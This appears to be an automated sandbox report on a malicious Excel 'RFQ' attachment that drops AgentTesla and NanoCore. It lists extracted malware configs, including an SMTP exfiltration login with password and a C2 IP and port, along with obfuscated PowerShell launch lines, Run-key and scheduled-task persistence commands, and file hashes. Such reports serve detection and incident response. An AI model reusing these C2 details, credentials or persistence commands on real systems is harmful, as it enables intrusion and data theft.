Analysis
- max time kernel: 148s
- max time network: 153s
- platform: windows7_x64
- resource: win7-en-20210920
- submitted: 26-09-2021 19:19
Static task: static1
Behavioral task: behavioral1
  Sample: RFQ#903_260921_new_request_10012_products.xls
  Resource: win7-en-20210920
Behavioral task: behavioral2
  Sample: RFQ#903_260921_new_request_10012_products.xls
  Resource: win10v20210408
General
- Target: RFQ#903_260921_new_request_10012_products.xls
- Size: 38KB
- MD5: 03cf64f6dff8c1467a756d8c2e2fac16
- SHA1: c124554906286cdaa48240a394777b1ef6c853fe
- SHA256: 17b7d30b0960240b297dc208673fd4d8e9bfe52fc68a24785b83dc4b6702dba5
- SHA512: 4d47bc2367459ad55f2c5a91733d729c045035f0d8ad3fefa7f1ba015d68da957efbafd3dbb25a3033fcb4ac539480cc1c5d8d6e4d8baefe61f68caeca25bbb9
Malware Config
Extracted: agenttesla
- Protocol: smtp
- Host: smtp.privateemail.com
- Port: 587
- Username: [email protected]
- Password: office12#
Extracted: nanocore
- Version: 1.2.2.0
- C2: 185.140.53.52:4488
- Mutex: 4457cc23-84d1-4515-bdf3-bc83fe8472db
- activate_away_mode: true
- backup_connection_host:
- backup_dns_server: 8.8.4.4
- buffer_size: 65535
- build_time: 2021-07-08T12:51:02.136438436Z
- bypass_user_account_control: false
- bypass_user_account_control_data: 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
- clear_access_control: true
- clear_zone_identifier: false
- connect_delay: 4000
- connection_port: 4488
- default_group: EXPO
- enable_debug_mode: true
- gc_threshold: 1.048576e+07
- keep_alive_timeout: 30000
- keyboard_logging: false
- lan_timeout: 2500
- max_packet_size: 1.048576e+07
- mutex: 4457cc23-84d1-4515-bdf3-bc83fe8472db
- mutex_timeout: 5000
- prevent_system_sleep: false
- primary_connection_host: 185.140.53.52
- primary_dns_server: 8.8.8.8
- request_elevation: true
- restart_delay: 5000
- run_delay: 0
- run_on_startup: false
- set_critical_process: true
- timeout_interval: 5000
- use_custom_dns_server: false
- version: 1.2.2.0
- wan_timeout: 8000
Signatures
- AgentTesla
  Agent Tesla is a remote access tool (RAT) written in Visual Basic.
- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes:
  description | pid | pid_target | process | target process
  Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process | 1800 | 612 | cmd.exe | EXCEL.EXE
- suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
- suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
- AgentTesla Payload (3 IoCs)
  Processes:
  resource | yara_rule
  \Users\Admin\AppData\Roaming\ammero.exe | family_agenttesla
  C:\Users\Admin\AppData\Roaming\ammero.exe | family_agenttesla
  C:\Users\Admin\AppData\Roaming\ammero.exe | family_agenttesla
- Downloads MZ/PE file
- Executes dropped EXE (3 IoCs)
  Processes:
  pid | process
  1948 | expo.exe
  1728 | ammero.exe
  392 | InstallUtil.exe
- Loads dropped DLL (3 IoCs)
  Processes:
  pid | process
  680 | ei.exe
  1948 | expo.exe
  1948 | expo.exe
- Obfuscated with Agile.Net obfuscator (1 IoC)
  Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
  Processes:
  resource | yara_rule
  behavioral1/memory/680-66-0x00000000006B0000-0x00000000006D1000-memory.dmp | agile_net
- Adds Run key to start application (2 TTPs, 3 IoCs)
  Processes:
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run | reg.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run\expo = "C:\\Users\\Admin\\AppData\\Roaming\\expo.exe" | reg.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\UDP Subsystem = "C:\\Program Files (x86)\\UDP Subsystem\\udpss.exe" | InstallUtil.exe
- Checks whether UAC is enabled
  Processes:
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | InstallUtil.exe
- Suspicious use of SetThreadContext (1 IoC)
  Processes:
  description | pid | process | target process
  PID 1948 set thread context of 392 | 1948 | expo.exe | InstallUtil.exe
- Drops file in Program Files directory (2 IoCs)
  Processes:
  description | ioc | process
  File opened for modification | C:\Program Files (x86)\UDP Subsystem\udpss.exe | InstallUtil.exe
  File created | C:\Program Files (x86)\UDP Subsystem\udpss.exe | InstallUtil.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Office loads VBA resources, possible macro or embedded object present
- Creates scheduled task(s) (1 TTP, 2 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  Processes:
  pid | process
  1388 | schtasks.exe
  1556 | schtasks.exe
- Enumerates system info in registry (2 TTPs, 1 IoC)
  Processes:
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | EXCEL.EXE
- Modifies Internet Explorer settings
  Processes:
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | EXCEL.EXE
  Set value (int) | \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | EXCEL.EXE
  Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | EXCEL.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | EXCEL.EXE
  Key created | \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | EXCEL.EXE
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | EXCEL.EXE
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | EXCEL.EXE
  Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | EXCEL.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command | EXCEL.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" | EXCEL.EXE
  Key created | \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar | EXCEL.EXE
  Set value (str) | \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | EXCEL.EXE
  Set value (int) | \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | EXCEL.EXE
  Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | EXCEL.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | EXCEL.EXE
  Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND | EXCEL.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | EXCEL.EXE
  Key created | \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt | EXCEL.EXE
  Set value (str) | \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | EXCEL.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | EXCEL.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | EXCEL.EXE
  Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND | EXCEL.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | EXCEL.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command | EXCEL.EXE
  Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | EXCEL.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | EXCEL.EXE
  Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | EXCEL.EXE
  Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | EXCEL.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | EXCEL.EXE
  Set value (str) | \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | EXCEL.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" | EXCEL.EXE
- Modifies registry class (64 IoCs)
  Processes:
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile | EXCEL.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile | EXCEL.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" | EXCEL.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open" | EXCEL.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" | EXCEL.EXE
  Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command | EXCEL.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher | EXCEL.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit | EXCEL.EXE
  Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit | EXCEL.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll" | EXCEL.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm | EXCEL.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit | EXCEL.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit" | EXCEL.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit | EXCEL.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command | EXCEL.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" | EXCEL.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" | EXCEL.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | EXCEL.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open" | EXCEL.EXE
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 | EXCEL.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit | EXCEL.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" | EXCEL.EXE
  Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print | EXCEL.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit | EXCEL.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec | EXCEL.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell | EXCEL.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command | EXCEL.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command | EXCEL.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command | EXCEL.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command | EXCEL.EXE
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | EXCEL.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" | EXCEL.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile | EXCEL.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | EXCEL.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" | EXCEL.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec | EXCEL.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" | EXCEL.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application | EXCEL.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command | EXCEL.EXE
  Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit | EXCEL.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\"" | EXCEL.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | EXCEL.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command | EXCEL.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe | EXCEL.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" | EXCEL.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" | EXCEL.EXE
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | EXCEL.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit | EXCEL.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" | EXCEL.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | EXCEL.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe | EXCEL.EXE
  Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command | EXCEL.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit | EXCEL.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command | EXCEL.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" | EXCEL.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | EXCEL.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" | EXCEL.EXE
  Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command | EXCEL.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon | EXCEL.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command | EXCEL.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | EXCEL.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application | EXCEL.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit | EXCEL.EXE
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | EXCEL.EXE
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  Processes:
  pid | process
  612 | EXCEL.EXE
- Suspicious behavior: EnumeratesProcesses (16 IoCs; repeated rows collapsed with a count)
  Processes:
  pid | process | count
  896 | powershell.exe | 1
  680 | ei.exe | 5
  1948 | expo.exe | 2
  1728 | ammero.exe | 2
  392 | InstallUtil.exe | 6
- Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  Processes:
  pid | process
  392 | InstallUtil.exe
- Suspicious use of AdjustPrivilegeToken (5 IoCs)
  Processes:
  description | pid | process
  Token: SeDebugPrivilege | 896 | powershell.exe
  Token: SeDebugPrivilege | 680 | ei.exe
  Token: SeDebugPrivilege | 1948 | expo.exe
  Token: SeDebugPrivilege | 1728 | ammero.exe
  Token: SeDebugPrivilege | 392 | InstallUtil.exe
- Suspicious use of FindShellTrayWindow (2 IoCs)
  Processes:
  pid | process
  612 | EXCEL.EXE
  612 | EXCEL.EXE
- Suspicious use of SetWindowsHookEx (3 IoCs)
  Processes:
  pid | process
  612 | EXCEL.EXE
  612 | EXCEL.EXE
  612 | EXCEL.EXE
- Suspicious use of WriteProcessMemory (48 IoCs; repeated rows collapsed with a count)
  Processes:
  description | pid | process | target process | count
  PID 612 wrote to memory of 1800 | 612 | EXCEL.EXE | cmd.exe | 4
  PID 1800 wrote to memory of 896 | 1800 | cmd.exe | powershell.exe | 4
  PID 896 wrote to memory of 680 | 896 | powershell.exe | ei.exe | 4
  PID 680 wrote to memory of 1328 | 680 | ei.exe | cmd.exe | 4
  PID 1328 wrote to memory of 1976 | 1328 | cmd.exe | reg.exe | 4
  PID 680 wrote to memory of 1948 | 680 | ei.exe | expo.exe | 4
  PID 1948 wrote to memory of 1728 | 1948 | expo.exe | ammero.exe | 4
  PID 1948 wrote to memory of 392 | 1948 | expo.exe | InstallUtil.exe | 12
  PID 392 wrote to memory of 1388 | 392 | InstallUtil.exe | schtasks.exe | 4
  PID 392 wrote to memory of 1556 | 392 | InstallUtil.exe | schtasks.exe | 4
Processes (tree; indentation shows parent/child relationship)
- C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
  Command line: "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\RFQ#903_260921_new_request_10012_products.xls
  PID: 612
  Signatures: Enumerates system info in registry; Modifies Internet Explorer settings; Modifies registry class; Suspicious behavior: AddClipboardFormatListener; Suspicious use of FindShellTrayWindow; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c Po^W^ERS^he^LL -E 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
    PID: 1800
    Signatures: Process spawned unexpected child process; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: PoWERSheLL -E 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
      PID: 896
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - C:\Users\Admin\AppData\Local\Temp\ei.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\ei.exe"
        PID: 680
        Signatures: Loads dropped DLL; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
        - C:\Windows\SysWOW64\cmd.exe
          Command line: "cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "expo" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\expo.exe"
          PID: 1328
          Signatures: Suspicious use of WriteProcessMemory
          - C:\Windows\SysWOW64\reg.exe
            Command line: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "expo" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\expo.exe"
            PID: 1976
            Signatures: Adds Run key to start application
        - C:\Users\Admin\AppData\Roaming\expo.exe
          Command line: "C:\Users\Admin\AppData\Roaming\expo.exe"
          PID: 1948
          Signatures: Executes dropped EXE; Loads dropped DLL; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
          - C:\Users\Admin\AppData\Roaming\ammero.exe
            Command line: "C:\Users\Admin\AppData\Roaming\ammero.exe"
            PID: 1728
            Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
          - C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
            Command line: "C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"
            PID: 392
            Signatures: Executes dropped EXE; Adds Run key to start application; Checks whether UAC is enabled; Drops file in Program Files directory; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: GetForegroundWindowSpam; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
            - C:\Windows\SysWOW64\schtasks.exe
              Command line: "schtasks.exe" /create /f /tn "UDP Subsystem" /xml "C:\Users\Admin\AppData\Local\Temp\tmpFAE1.tmp"
              PID: 1388
              Signatures: Creates scheduled task(s)
            - C:\Windows\SysWOW64\schtasks.exe
              Command line: "schtasks.exe" /create /f /tn "UDP Subsystem Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmpFC68.tmp"
              PID: 1556
              Signatures: Creates scheduled task(s)
Network
MITRE ATT&CK Enterprise v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
  MD5: 91c9ae9c9a17a9db5e08b120e668c74c
  SHA1: 50770954c1ceb0bb6f1d5d3f2de2a0a065773723
  SHA256: e56a7e5d3ab9675555e2897fc3faa2dd9265008a4967a7d54030ab8184d2d38f
  SHA512: ca504af192e3318359d4742a2ef26ae1b5d040a4f9942782e02549a310158d5d5dbf919b4c748c31ee609d2046bd23ee0c22712891c86ae4a1e3a58c6e67647e
- C:\Users\Admin\AppData\Local\Temp\tmpFAE1.tmp
  MD5: f7eb19c49b51cdff67a25c6876a78241
  SHA1: 6d86be501c2fb57b50292a55d3983b7eee8a688d
  SHA256: c9dab73a0044021d2acbc3952b19dea98cdfd838afc633197bd1bd12d2562fba
  SHA512: 1e94e363f9d4d0dcdfe0a8457642fcfe4f81dff0b39f1d1f00deab9291e133cd40b48c097dfe52c356d4a15c383e0aa08fae28b136937bcc57d5e01861716740
- C:\Users\Admin\AppData\Local\Temp\tmpFC68.tmp
  MD5: c4aecdef99eba873119e79616df3f4b0
  SHA1: b1b3af52655fb633eed909dfed05b64fbbfac37c
  SHA256: 24fd0d87bea36a024449a95f808aaa174e4ed9003cb8a427b67c02411b8a2e0b
  SHA512: e3f44b07267fccf4f5abd4efe80f2b037ddadc4cb898bdfca9d21ac5d79fcac828950065c2060d3ce125ee971fc3096183afee5287ba9951fbbda7257d8ed8d4
- C:\Users\Admin\AppData\Roaming\ammero.exe
  MD5: 605e939e44cd9b02c55ce0a09019ad47
  SHA1: 9ac8ff474631ed0c3d27a7290979b4880b9784f6
  SHA256: 5ab99263d0101e00809c2fe1f068bbcb601208c3fb0efd753b36169a3a69c589
  SHA512: 5196b9b698a71dc4510a57acabaee22ec2cd3f35c7c82c0ccbc00673ee97b471019a79e4cdb1ec6b5765ef70f1b5aebc19f56b0fa6a9932844c8ae07ba8b2b9d
- C:\Users\Admin\AppData\Roaming\expo.exe
  MD5: 419179d921ed1c875e2c690ee521d516
  SHA1: 12750f63f89e8086d59948ebe3664473364f72dc
  SHA256: 99b390b6b37a14d651e2bfc9d4588385c13ab7a367129a9e753f6650f6867d54
  SHA512: 823bfb71c82aedef4449cd1a584a0810b050139368ce0bb801ae0be629fdecac98733e48f6978e1d08020031f9ace52d050123baf035cf1bb87bd4b15e2c9702
- \Users\Admin\AppData\Local\Temp\InstallUtil.exe
  MD5: 91c9ae9c9a17a9db5e08b120e668c74c
  SHA1: 50770954c1ceb0bb6f1d5d3f2de2a0a065773723
  SHA256: e56a7e5d3ab9675555e2897fc3faa2dd9265008a4967a7d54030ab8184d2d38f
  SHA512: ca504af192e3318359d4742a2ef26ae1b5d040a4f9942782e02549a310158d5d5dbf919b4c748c31ee609d2046bd23ee0c22712891c86ae4a1e3a58c6e67647e
- \Users\Admin\AppData\Roaming\ammero.exe
  MD5: 605e939e44cd9b02c55ce0a09019ad47
  SHA1: 9ac8ff474631ed0c3d27a7290979b4880b9784f6
